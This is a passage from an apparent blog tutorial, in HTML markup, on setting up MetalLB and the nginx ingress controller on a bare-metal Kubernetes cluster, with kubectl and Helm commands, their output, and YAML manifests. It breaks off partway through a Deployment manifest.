&lt;p&gt;After running the previous commands, a new namespace will be created with a deployment, daesmonset and lot of RBAC authorization and rules!. So let’s check this namespace!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;raf²@4n6nk8s-master$ kubectl get all -n metallb-system&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;NAME                              READY   STATUS    RESTARTS       AGE&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;pod/controller-7cf77c64fb-4b8sx   1/1     Running   0              23s&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;pod/speaker-chh2t                 1/1     Running   0              23s&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;pod/speaker-xbn8z                 1/1     Running   0              23s&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;NAME                     DESIRED   CURRENT   READY   UP-TO-DATE   AVAILABLE   NODE SELECTOR            AGE&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;daemonset.apps/speaker   2         2         2       2            2           kubernetes.io/os=linux   23s&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;NAME                         READY   UP-TO-DATE   AVAILABLE   AGE&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;deployment.apps/controller   1/1     1            1           23s&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;NAME                                    DESIRED   CURRENT   READY   AGE&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;replicaset.apps/controller-7cf77c64fb   1         1         1       23s&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;h2 id=&#34;configure-the-address-pool-of-the-load-balancer&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#configure-the-address-pool-of-the-load-balancer&#34;&gt;#&lt;/a&gt; Configure the address pool of the Load Balancer&lt;/h2&gt;
&lt;p&gt;Now we must configure the  &lt;code&gt;metalLB&lt;/code&gt;  using configmap object. In this configmap we give the address pool that will be used as LoadBalancer IP! Also the type of the Load Balancer.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;metalLB supports two LoadBalancing modes : Layer 2 mode and BGP mode. In our case we will use the Layer 2 mode&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Now Let’s move to the configmap manifest!&lt;/p&gt;
&lt;figure class=&#34;highlight yaml&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Configmap&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;apiVersion:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;v1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;kind:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;ConfigMap&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;metadata:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;namespace:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;metallb-system&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;config&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;data:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;config:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;|&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;string&#34;&gt;    address-pools:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;string&#34;&gt;    - name: default&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;string&#34;&gt;      protocol: layer2&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;string&#34;&gt;      addresses:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;string&#34;&gt;      - 192.168.1.240-192.168.1.250&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;After Applying this recent configmap. we can say that the metalLB installtion is finished! So Let’s check the services again in our cluster !&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;raf²@4n6nk8s-master$ kubectl get svc&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;NAME              TYPE           CLUSTER-IP       EXTERNAL-IP     PORT(S)        AGE&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s-kitchen   LoadBalancer   10.97.71.78      192.168.1.241   80:30918/TCP   5m4s&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;kubernetes        ClusterIP      10.96.0.1        &amp;lt;none&amp;gt;          443/TCP        5d11h&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Bingo! our Load Balancer service has an external IP address. So our deployment is accessable through this IP! Let’s check it:&lt;br&gt;
ٍ&lt;img data-src=&#34;https://imgur.com/jWkr5kf.png&#34; alt=&#34;&#34;&gt;&lt;br&gt;
Everything is OK! now we can say that we have a Load Balancer on our bare metal cluster!&lt;/p&gt;
&lt;h1 id=&#34;install-the-nginx-ingress-controller&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#install-the-nginx-ingress-controller&#34;&gt;#&lt;/a&gt; Install the nginx Ingress Controller:&lt;/h1&gt;
&lt;p&gt;Installing the nginx ingress controller can be done either by using Helm or the yaml manifest provided in the nginx controller website&lt;/p&gt;
&lt;h2 id=&#34;install-the-controller-using-helm&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#install-the-controller-using-helm&#34;&gt;#&lt;/a&gt; Install the controller using Helm&lt;/h2&gt;
&lt;p&gt;If you have Helm, you can deploy the ingress controller with the following command:&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;raf²@4n6nk8s-master$ helm upgrade --install ingress-nginx ingress-nginx \&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  --repo https://kubernetes.github.io/ingress-nginx \&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  --namespace ingress-nginx --create-namespace&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;h2 id=&#34;install-the-controller-using-yaml-manifest&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#install-the-controller-using-yaml-manifest&#34;&gt;#&lt;/a&gt; Install the controller using yaml manifest:&lt;/h2&gt;
&lt;p&gt;If you don’t have Helm or if you prefer to use a YAML manifest, you can run the following command instead:&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;18&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;19&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;20&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;21&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;raf²@4n6nk8s-master$ kubectl apply -f https://raw.githubusercontent.com/kubernetes/ingress-nginx/controller-v1.2.0/deploy/static/provider/cloud/deploy.yaml&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;namespace/ingress-nginx created&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;serviceaccount/ingress-nginx created&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;serviceaccount/ingress-nginx-admission created&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;role.rbac.authorization.k8s.io/ingress-nginx created&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;role.rbac.authorization.k8s.io/ingress-nginx-admission created&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;clusterrole.rbac.authorization.k8s.io/ingress-nginx created&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;clusterrole.rbac.authorization.k8s.io/ingress-nginx-admission created&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;rolebinding.rbac.authorization.k8s.io/ingress-nginx created&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;rolebinding.rbac.authorization.k8s.io/ingress-nginx-admission created&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;clusterrolebinding.rbac.authorization.k8s.io/ingress-nginx created&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;clusterrolebinding.rbac.authorization.k8s.io/ingress-nginx-admission created&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;configmap/ingress-nginx-controller created&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;service/ingress-nginx-controller created&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;service/ingress-nginx-controller-admission created&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;deployment.apps/ingress-nginx-controller created&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;job.batch/ingress-nginx-admission-create created&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;job.batch/ingress-nginx-admission-patch created&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;ingressclass.networking.k8s.io/nginx created&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;validatingwebhookconfiguration.admissionregistration.k8s.io/ingress-nginx-admission created&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;h2 id=&#34;check-the-nginx-ingress-controller&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#check-the-nginx-ingress-controller&#34;&gt;#&lt;/a&gt; Check the Nginx Ingress Controller:&lt;/h2&gt;
&lt;p&gt;Let’s check the pods created in the namespace of the ingress-nginx&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;raf²@4n6nk8s-master$ kubectl get pods --namespace=ingress-nginx&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;NAME                                        READY   STATUS              RESTARTS   AGE&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;ingress-nginx-admission-create-qd8fz        0/1     ContainerCreating   0          10s&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;ingress-nginx-admission-patch-76lgl         0/1     ContainerCreating   0          10s&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;ingress-nginx-controller-7575567f98-hg6tq   0/1     ContainerCreating   0          10s&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;After waiting a few minute until the controller is ready, we must check all the services and deployments of the ingress-nginx namespace again ! You must find an output similar to the following&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;18&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;19&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;20&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;raf²@4n6nk8s-master$ kubectl get all -n ingress-nginx&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;NAME                                            READY   STATUS      RESTARTS        AGE&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;pod/ingress-nginx-admission-create-9dshm        0/1     Completed   0               23m&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;pod/ingress-nginx-admission-patch-rj7gk         0/1     Completed   0               23m&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;pod/ingress-nginx-controller-7575567f98-8w6pm   1/1     Running     0               23m&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;NAME                                         TYPE           CLUSTER-IP       EXTERNAL-IP     PORT(S)                      AGE&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;service/ingress-nginx-controller             LoadBalancer   10.100.234.221   192.168.1.240   80:32545/TCP,443:31214/TCP   23m&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;service/ingress-nginx-controller-admission   ClusterIP      10.109.162.157   &amp;lt;none&amp;gt;          443/TCP                      23m&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;NAME                                       READY   UP-TO-DATE   AVAILABLE   AGE&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;deployment.apps/ingress-nginx-controller   1/1     1            1           23m&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;NAME                                                  DESIRED   CURRENT   READY   AGE&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;replicaset.apps/ingress-nginx-controller-7575567f98   1         1         1       23m&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;NAME                                       COMPLETIONS   DURATION   AGE&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;job.batch/ingress-nginx-admission-create   1/1           3s         23m&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;job.batch/ingress-nginx-admission-patch    1/1           4s         23m&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Bingo! the ingress controller is ready and on running state! also is exposed with Load Balancer and it have a Extenal-IP  &lt;code&gt;192.168.1.240&lt;/code&gt; &lt;br&gt;
Now we can deploy an ingress object without any problem ! It’s time to deploy our 2 apps with ingress in one single domain name and one IP address !&lt;/p&gt;
&lt;h1 id=&#34;deploy-the-two-apps-using-ingress&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#deploy-the-two-apps-using-ingress&#34;&gt;#&lt;/a&gt; Deploy The two Apps using Ingress:&lt;/h1&gt;
&lt;p&gt;Let’s start by deploying the apps and expose it with Cluster IP service !&lt;/p&gt;
&lt;figure class=&#34;highlight yaml&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Gym App Deployment&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;18&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;19&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;20&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;21&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;22&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;23&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;24&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;25&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;26&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;27&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;28&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;29&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;30&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;31&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;apiVersion:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;apps/v1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;kind:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;Deployment&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;metadata:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;4n6nk8s-gym&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;spec:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;replicas:&lt;/span&gt; &lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;selector:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;matchLabels:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;attr&#34;&gt;app:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;gym&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;template:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;metadata:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;attr&#34;&gt;labels:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;attr&#34;&gt;app:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;gym&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;spec:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;attr&#34;&gt;containers:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;gym-app&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;attr&#34;&gt;image:&lt;/span&gt; &lt;span 